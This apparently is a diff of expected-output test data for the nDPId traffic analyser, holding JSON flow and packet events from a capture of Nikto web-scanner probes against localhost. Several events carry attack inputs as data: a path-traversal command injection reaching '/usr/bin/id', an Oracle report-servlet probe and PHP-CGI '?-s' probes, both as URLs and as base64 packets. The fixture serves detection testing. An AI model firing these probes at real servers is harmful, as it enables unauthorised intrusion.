00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} 
+01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} 
+01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} 
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} 
+01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 